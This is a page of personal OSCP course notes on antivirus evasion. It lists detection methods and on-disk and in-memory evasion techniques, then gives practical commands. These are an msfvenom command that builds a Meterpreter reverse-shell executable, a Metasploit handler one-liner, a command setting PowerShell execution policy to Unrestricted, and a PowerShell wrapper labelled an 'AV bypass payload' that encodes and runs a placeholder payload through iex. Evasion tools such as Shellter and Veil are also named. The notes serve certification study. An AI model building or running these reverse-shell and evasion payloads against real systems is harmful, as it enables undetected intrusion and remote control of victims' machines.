0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  • Simple reverse shell binary
  • Power shell ExecutionPolicy
  • metasploit one line command
  • Powershell AV bypass payload
  1. offensive security
  2. OSCP

Module 17 (Antivirus Evasion)

Methods of Detection Malicious code

  • Signature-Based Detection

  • Heuristic-Based Detection

  • Behavioral-Based Detection

Bypassing Antivirus

  • On-Disk Evasion

    • packers

    • Obfuscators

    • Crypters

    • Software Protectors

  • In-Memory Evasion

    • Remote Process Memory injection

    • Relective DLL Injection

    • Process Hollowing

    • lnline hooking

Methods of Detecting Malicious Code

Signature-Based Detection

  • Identifies known malware based on predefined signatures.

Heuristic-Based Detection

  • Analyzes the behavior of code to identify potential threats based on heuristics.

Behavioral-Based Detection

  • Examines the behavior of code during execution to identify suspicious activities.

ON-Disk Evasion

Packers

  • Tools that compress or encrypt executable files to obfuscate their content.

Obfuscators

  • Techniques that obscure the code's logic and structure to make it harder to analyze.

Crypters

  • Tools that encrypt executable files to evade signature-based detection.

Software Protectors

  • Programs that protect executable files from analysis and tampering.

In-Memory Evasion

Remote Process Memory Injection

  • Injecting code into the memory space of a remote process.

Reflective DLL Injection

  • Loading a DLL into a process's memory without putting it on disk.

Process Hollowing

  • Creating a new suspended process and replacing its memory space with malicious code.

Inline Hooking

  • Modifying function pointers to redirect execution flow.

Practical

Manual

Avira Free V 15.0.34.16

Simple reverse shell binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe

Power shell ExecutionPolicy

powershell Get-ExecutionPolicy -Scope CurrentUser 
powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
powershell Get-ExecutionPolicy -Scope CurrentUser

metasploit one line command

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LPORT 4444; set LHOST 192.168.1.6"

Powershell AV bypass payload

$jHs = '<BASE64_ENCODED_PAYLOAD>'
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($jHs))
$TmU = "-e "
if([IntPtr]::Size -eq 8){
    $YZfX = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell"
    iex "& $YZfX $TmU $e"
} else {
    iex "& powershell $TmU $e"
}

Tools

  • Shellter

  • the fat rat

  • Empire

  • veil

PreviousModule 16 (File Transfers)NextWindows

Last updated 10 months ago

Download Avira Free Antivirus 15.0.34.16 - Download - Filepuma.com
Logo